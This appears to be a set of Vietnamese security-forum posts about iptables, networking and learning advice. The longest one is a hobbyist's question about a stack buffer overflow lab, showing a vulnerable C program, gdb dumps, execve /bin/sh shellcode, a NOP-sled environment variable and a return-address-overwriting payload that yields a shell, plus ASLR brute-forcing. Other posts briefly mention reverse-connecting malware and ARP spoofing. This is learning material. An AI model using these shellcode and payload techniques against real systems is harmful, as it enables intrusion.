|
|
@Khoai: Facebook của HVA mình nghĩ đúng là của HVA đấy, do anh Kyo và Xnohat lập nên, có cả bác Diêu Conmale nữa
|
|
|
counter89 wrote:
cho e tham gia với bác mọi tài liệu gửi về taovps15@gmail.com , rất mong sự giúp đở từ bác
Ai rảnh mà đi gửi cho bạn. Muốn học thì trước hết hãy đọc kĩ topic này đi đã nhé.
Có 3 cách học như đã nói, 1 là lên trang scriptkidy.com, 2 là lên youtube của xnohat, 3 là lên diễn đàn để ý topic nào có chữ Script kidy ở đầu.
|
|
|
Có thể còn do firewall của router từ HN -> DN nữa, 2 cái cùng ở DN thì k phải qua router đấy.
Còn 1 điều nữa, ping là dùng ICMP, ICMP có thể không được nhưng nếu TCP/UDP vẫn được mà việc xem camera k dùng đến ICMP thì vẫn có thể xem được. Bạn cứ thử xem, không nhất thiết ping phải được.
|
|
|
Đứt cáp quang mà bạn. Google và facebook đều ở bên Mỹ nên sẽ bị ảnh hưởng.
|
|
|
@invalid-password: file cấu hình hay command gõ vào thì cũng thế vì đó là -P: Policy mà. Tất cả những gì không match với rules trong chain thì sẽ theo policy của chain đó.
|
|
|
Sao bạn không tự làm 1 site như thế đi
|
|
|
Sau này bạn dự định làm nghề gì? Web dev? Nếu thế thì mình nghĩ sẽ k cần học C/C++, tuy nhiên kiểu gì lên đại học bạn chả phải học Bây giờ 17 tuổi nếu muốn tìm hiểu sớm thì cứ học web design đi cũng được.
Mình cũng 17 tuổi, nhưng muốn làm về system hơn, hay đúng hơn là bảo mật web server, mà 1 cái server thì liên quan đến mọi thứ, từ phần mềm, software exploitation, web dev, mạng, từ web server lại liên quan đến DNS + mail server, cho nên mình... học hết, mỗi thứ biết 1 tí
P/s: btw, mình nghĩ những thứ bạn nói đến là Web Application Testing mới đúng chứ nhỉ?
|
|
|
Mình cũng nghĩ là phải -o -s. Mình đã đọc bài này, nhưng trước đấy có tự viết 1 cái script kiểu thế này nên lúc đọc bài phần này qua loa k để ý lắm, chỉ để ý mấy ý chính
Với cả, dòng 13 15 17 có vẻ hơi thừa thì phải, vì policy đã là DROP hết rồi thì sau khi log kiểu gì nó chả bị drop, cần gì phải thêm 3 dòng đấy nhỉ?
|
|
|
Báo lỗi thì phải nói rõ là lỗi gì chứ, không nói ai biết được @@
Quan sát thì thấy hình như 2 dấu trừ khác nhau. Thứ 2 là chỗ sport, dport phải là 2 dấu trừ.
|
|
|
Thì bạn cứ học đi, phần nào TA không hiểu thì hỏi tiếng Việt cũng được, nhưng nhất thiết phải học tiếng Anh
|
|
|
Kill process 3734 xong xoá có được không vậy?
|
|
|
Mù tiếng Anh thì học, đừng có lấy đó làm lí do, mù tiếng Anh thì theo iT sao được?
Bạn có câu hỏi thì cứ post lên đây, hoặc tốt hơn là lên group của HVA, facebook thì sẽ có nhiều người giúp hơn
Cuối cùng, bạn viết tiếng Việt rõ 1 tí, chả mấy ai thích kiểu viết cứ "nhìu", "hỉu", "bít",.. đâu. Mà đã không thích, có ấn tượng xấu từ đầu thì giúp đỡ cũng sẽ không nhiệt tình mấy đâu.
|
|
|
Cái bạn ở trên syn flood xong gọi là DDoS cũng k hẳn, ở đây chỉ làm ngập băng thông rồi máy nó treo chứ chả có Syn phờ lắt phờ liếc gì cả, gửi 1 đống gói tin đến máy nó cũng đã ngập băng thông xong treo rồi. DDoS, theo đúng tên của nó: Distributed Denial of Service, là phải đánh vào 1 service nào đó. Bạn ở trên bảo dùng hping3 trong backtrack cho mình hỏi tí, bạn syn flood service nào, bằng chứng nào cho thấy bạn DDoS thành công, tức là service ấy đã bị "denied"? Nếu bạn trả lời được thì mình công nhận đấy là DoS (chứ không phải DDoS nhé, DDoS là nhiều -> 1).
josdtt99 wrote:
backtrack đi bạn ơi!
Backtrack? "Backtrack đi bạn ơi" là thế nào? Backtrack có cả trăm tools bảo người ta dùng backtrack nhưng k bảo dùng như nào, dùng cái gì để đạt được mục đích thì bảo làm gì? Lại kiểu biết 1 tí về hack, nghe lỏm được hack thì dùng backtrack, thế là vào comment "backtrack đi bạn ơi!" như đúng rồi.
|
|
|
Sau 3 năm rưỡi bác mới lại vào comment lại ở topic này :-o
|
|
|
trjeunguyen wrote:
kakarottbatdong wrote:
trjeunguyen wrote:
Anh ơi cho em hỏi thêm là nếu em không tắt cái iptables đó thì có cách nào em dùng máy khác truy cập vào máy chủ web được không anh.
Không phải là tắt, nếu không rành thì Del hết rule trên đó, cho CHAIN INPUT và OUTPUT ==> ACCEPT
Nếu iptables DROP port 80 thì truy cập máy chủ web port 80 bằng niềm tin à.
Cám ơn anh, mai em báo cáo rồi mà bây giờ không viết được cái rule, chắc die quá
Trời ơi iptables -h 1 phát là ra cả đống manual đó, hoặc không thì google @@ Em thấy khó hiểu mỗi cái rule của iptables còn không tự mò mẫm được thì theo ngành tin kiểu gì @@
|
|
|
kienmanowar wrote:
qwerty13 wrote:
Thay vì hỏi thì tại sao bạn không tự google nhỉ -.- Ngay trên trang chủ cũng có nói, google thì cả trăm bài, tại sao bạn không tự đi tìm?
Đó là "bệnh" không chữa nổi
Em từ trước đến giờ sách học lớn nhất vẫn là anh google Chủ yếu là biết chọn lọc xử lí không thôi
graycap wrote:
e có vùa hỏi + vừa tìm nói chung là ok rồi
Mình nghĩ bạn nên tìm trước, không ra rồi mới đi hỏi
|
|
|
Thay vì hỏi thì tại sao bạn không tự google nhỉ -.- Ngay trên trang chủ cũng có nói, google thì cả trăm bài, tại sao bạn không tự đi tìm?
|
|
|
Nói luôn là xâm nhập đi cho nhanh, muốn vào được mà không cần cài đặt cái gì, lại còn bày đặt máy tính nhà mình LOL Nói cho rõ ràng không mọi người lại hiểu nhầm, toàn vào nói gợi ý teamviewer với remote desktop.
Về vấn đề xâm nhập thì có vô vàn cách. Nếu máy victim có đang chạy 1 service nào đó trên 1 cổng mở nào đó, bạn có thể tấn công vào service đấy. Còn nếu máy victim chỉ là 1 máy bình thường, có nghĩa là bạn không thế kết nối được với máy victim, vì khi kết nối đến bạn sẽ bị chặn lại bởi router. Theo kiến thức của mình thì có thể dùng các loại malware,... để khiến máy victim kết nối ngược lại máy bạn.
kiichi123 wrote:
em thấy biết đc ip public nhưng trong là mạng LAN có nhiều địa chỉ private thì làm thế nào để vào được ạ, em là newbie nên ko biết nhiều mong các anh chỉ dạy thêm cho.
Để vào được thì bạn cần vào router, setup NAT cho 1 cổng nhất định của 1 địa chỉ IP nhất định trong mạng LAN.
|
|
|
Những câu hỏi trên, mình hỏi 1 câu thôi, bạn đã tìm hiểu chưa? Nếu rồi thì bạn tìm hiểu được những gì? Mình không tin bạn sẽ hỏi 1 câu chung chung như vậy nếu đã tìm hiểu về vấn đề trên.
|
|
|
Bạn thử kiểm tra lại xem bạn đã chọn đúng interface chưa? Có thể khi bạn dùng wifi bạn lại chọn nhầm interface của wired network -> không bắt được gì
|
|
|
Đầu tiên thì lúc nào cũng là HTML, mình thì nghĩ bạn nên học HTML5 :p sau đấy thì css và javascript. Sau khi học xong 3 thứ trên (mình nghĩ là cả 3 bắt buộc phải học) thì bắt đầu động đến dynamic web: php, asp, mysql...
1 trang rất tốt để học lập trình web: http://w3schools.com/
|
|
|
Hỏi cấu hình tối thiểu của Unix và Linux để cài lại Windows??? Ý bạn là sao?
Và Linux KHÔNG PHẢI hệ điều hành. Nó chỉ là kernel thôi. Bạn định dùng distribution nào? Mình nghĩ là cấu hình tối thiểu chắc chắn sẽ có trên google, vậy nên bạn cứ tự google trước đi rồi hãy hỏi.
|
|
|
Không đọc được là sao? Bạn có thể nói rõ hơn không, ví dụ như khi chạy lệnh cho aicrack-ng crack password dùng từ điển đã cho thì có hiện tượng gì?
|
|
|
/hvaonline/posts/list/36792.html
|
|
|
Bạn đã google thử các lỗi kia chưa? Kết quả bạn tìm được như thế nào?
|
|
|
@KyO: À em hỏi có phải địa chỉ của biến env mỗi lần 1 khác là do ALSR của linux không thì đúng là thế ạ. Em đã cho stack executable, disable Pro Police mà quên mất ALSR. Cảm ơn anh ạ.
À quên cho em hỏi, giá trị default của /proc/sys/kernel/randomize_va_space là 2 đúng k ạ? Em chỉnh về 0, bây giờ cho về 2 mà khi thử tìm địa chỉ biến môi trường thì có vẻ hơi lạ: 0xbfbb65e4, 0xbfeb25e4, 0xbf8fd5e4,... tức là 3 số cuối giống nhau ấy ạ, mà lúc trước thì không như thế. Em nghĩ là do base của stack dịch chuyển nhưng 3 số cuối vẫn giống nhau?
P/s: Em thử brute force đúng 1 địa chỉ 1000 lần, đến lần thứ 600 thì được với NOP sled 20000 bytes.
|
|
|
@StarGhost: Lần đầu tiên em nghe đến ASLR trong gdb sau khi bật lên thì đúng là địa chỉ của biến EGG có khác đi, tuy nhiên mỗi lần 1 khác. Em cũng có 1 chương trình để tìm địa chỉ biến môi trường theo tên biến và tên chương trình:
Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
char *ptr;
if(argc < 3) {
printf("Usage: %s <environment var> <target program name>\n", argv[0]);
exit(0);
}
ptr = getenv(argv[1]); /* Get env var location. */
ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name. */
printf("%s will be at %p\n", argv[1], ptr);
return 0;
}
Tuy nhiên mỗi lần chạy thì kết quả lại khác nhau. Có phải đây là do ASLR của linux không ạ?
|
|
|
Chào mọi người, em có vài điều muốn hỏi về stack-based buffer overflow:
Em có 1 chương trình như sau:
Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void foo(char *mes)
{
char buf[20];
strcpy(buf, mes);
}
int main(int argc, char **argv)
{
if (argc != 2) {
printf("Usage: %s <string>\n", argv[0]);
exit(1);
}
foo(argv[1]);
return 0;
}
Compile:
Code:
gcc -z execstack -fno-stack-protector -Wall -g overflow.c -o overflow
strcpy ở chương trình trên sẽ gây ra buffer overflow. Em thử khai thác:
Code:
(gdb) disass main
Dump of assembler code for function main:
0x08048496 <+0>: push ebp
0x08048497 <+1>: mov ebp,esp
0x08048499 <+3>: and esp,0xfffffff0
0x0804849c <+6>: sub esp,0x10
0x0804849f <+9>: cmp DWORD PTR [ebp+0x8],0x2
0x080484a3 <+13>: je 0x80484c6 <main+48>
0x080484a5 <+15>: mov eax,DWORD PTR [ebp+0xc]
0x080484a8 <+18>: mov eax,DWORD PTR [eax]
0x080484aa <+20>: mov DWORD PTR [esp+0x4],eax
0x080484ae <+24>: mov DWORD PTR [esp],0x8048570
0x080484b5 <+31>: call 0x8048330 <printf@plt>
0x080484ba <+36>: mov DWORD PTR [esp],0x1
0x080484c1 <+43>: call 0x8048360 <exit@plt>
0x080484c6 <+48>: mov eax,DWORD PTR [ebp+0xc]
0x080484c9 <+51>: add eax,0x4
0x080484cc <+54>: mov eax,DWORD PTR [eax]
0x080484ce <+56>: mov DWORD PTR [esp],eax
0x080484d1 <+59>: call 0x804847c <foo>
0x080484d6 <+64>: mov eax,0x0
0x080484db <+69>: leave
0x080484dc <+70>: ret
End of assembler dump.
Code:
(gdb) break 10
Breakpoint 1 at 0x8048494: file overflow.c, line 10.
(gdb) run AAAA
Starting program: /home/quan/bt/btc/shellcode/overflow AAAA
Breakpoint 1, foo (mes=0xbffff427 "AAAA") at overflow.c:10
10 }
(gdb) i r esp ebp
esp 0xbffff160 0xbffff160
ebp 0xbffff198 0xbffff198
(gdb) x/20xw $esp
0xbffff160: 0xbffff17c 0xbffff427 0xbffff402 0xb7fc0000
0xbffff170: 0x080484e0 0x08048380 0x00000000 0x41414141
0xbffff180: 0xb7fc0300 0x00000002 0x0804a000 0x08048532
0xbffff190: 0x00000002 0xbffff254 0xbffff1b8 0x080484d6
0xbffff1a0: 0xbffff427 0x00000000 0x080484eb 0xb7fc0000
(gdb) cont
Continuing.
[Inferior 1 (process 3161) exited normally]
Như vậy có thể thấy vị trí của return address là 0xbffff19c, vị trí của buf là 0xbffff17c. Ta sẽ cần 36 bytes để overwrite return address. Em dự định sẽ đặt shellcode vào 1 biến env là EGG cùng với 200 bytes NOP sled.
Đây là đoạn mã assembly em dùng làm shellcode:
Code:
BITS 32
; execve(const char *filename, char *const argv[], char *const envp[])
xor eax, eax
push eax
push 0x68732f2f ; Push "//sh" to the stack.
push 0x6e69622f ; Push "/bin" to the stack.
mov ebx, esp
push eax
mov ecx, esp
push eax
mov edx, esp
mov al, 11
int 0x80
Bây giờ em tìm địa chỉ của biến EGG:
Code:
quan@quantran:~/bt/btc/shellcode$ nasm shell.s
quan@quantran:~/bt/btc/shellcode$ export EGG=$(perl -e 'print "\x90"x200')$(cat shell)
quan@quantran:~/bt/btc/shellcode$ gdb -q ./overflow
Reading symbols from /home/quan/bt/btc/shellcode/overflow...done.
(gdb) break main
Breakpoint 1 at 0x804849f: file overflow.c, line 14.
(gdb) run
Starting program: /home/quan/bt/btc/shellcode/overflow
Breakpoint 1, main (argc=1, argv=0xbffff174) at overflow.c:14
14 if (argc != 2) {
(gdb) x/30s $esp + 0x260
...
0xbffff4f1: "EGG=", '\220' <repeats 196 times>...
0xbffff5b9: "\220\220\220\220\061\300Ph//shh/bin\211\343P\211\341P\211\342\260\v̀"
...
(gdb) cont
Continuing.
Usage: /home/quan/bt/btc/shellcode/overflow <string>
[Inferior 1 (process 3729) exited with code 01]
(gdb) quit
quan@quantran:~/bt/btc/shellcode$
Ta có thể thấy biến EGG nằm ở 0xbffff4f1. Khi chạy chương trình có thể địa chỉ sẽ khác đi 1 chút, tuy nhiên em nghĩ với 200 bytes NOP sled thì sẽ không vấn đề gì. Như vậy em sẽ dùng địa chỉ 0xbffff550 để overwrite return address.
Code:
quan@quantran:~/bt/btc/shellcode$ ./overflow $(perl -e 'print "\x90"x32 . "\x50\xf5\xff\xbf"')
Segmentation fault (core dumped)
quan@quantran:~/bt/btc/shellcode$ gdb -q ./overflow
Reading symbols from /home/quan/bt/btc/shellcode/overflow...done.
(gdb) run $(perl -e 'print "\x90"x32 . "\x50\xf5\xff\xbf"')
Starting program: /home/quan/bt/btc/shellcode/overflow $(perl -e 'print "\x90"x32 . "\x50\xf5\xff\xbf"')
process 3810 is executing new program: /bin/dash
$ ls
Makefile aa.c helloworld helloworld.s overflow overflow.c shell shell.s test test.c
$
[Inferior 1 (process 3810) exited normally]
(gdb) quit
quan@quantran:~/bt/btc/shellcode$ ./overflow $(perl -e 'print "\x90"x32 . "\x50\xf5\xff\xbf"')
Segmentation fault (core dumped)
Khi chạy ở ngoài thì bị segfault, tuy nhiên khi chạy ở gdb thì lại được??? Tại sao lại thế ạ? Liệu các biến môi trường có bị disable theo 1 cách nào đó không khi chương trình chạy ở ngoài? Sự khác biệt giữa chạy trong gdb với chạy ở ngoài là gì ạ?
Em cảm ơn trước ạ
P/s: Em vừa ngồi thử lại xong và bây giờ thì cả trong gdb cũng bị segfault. Pro Police đã bị disable, stack thì executable, shellcode đúng, vậy thì tại sao lại bị segfault ạ?
|
|
|
mylove14129 wrote:
meoit wrote:
mylove14129 wrote:
Để mình cho bạn cái ip(public) và làm ơn 'xâm nhập' vào cái máy ấy giúp mình nhé.
Mình ko biết về xâm nhập IP ^^ .
Nghe câu trả lời là hiểu.
Đồng ý với bạn này. Internet mà không biết IP thì bạn "xâm nhập" kiểu gì?
|
|
|
Cain and Abel dùng để thực hiện ARP spoofing, có nghĩa là chỉ trong mạng LAN của wifi thôi. Tìm hiểu thêm về ARP và HTTP session sidejacking: /hvaonline/posts/list/40470.html
P/s: sniffer chứ không phải niffer
|
|
|
|
|
|
|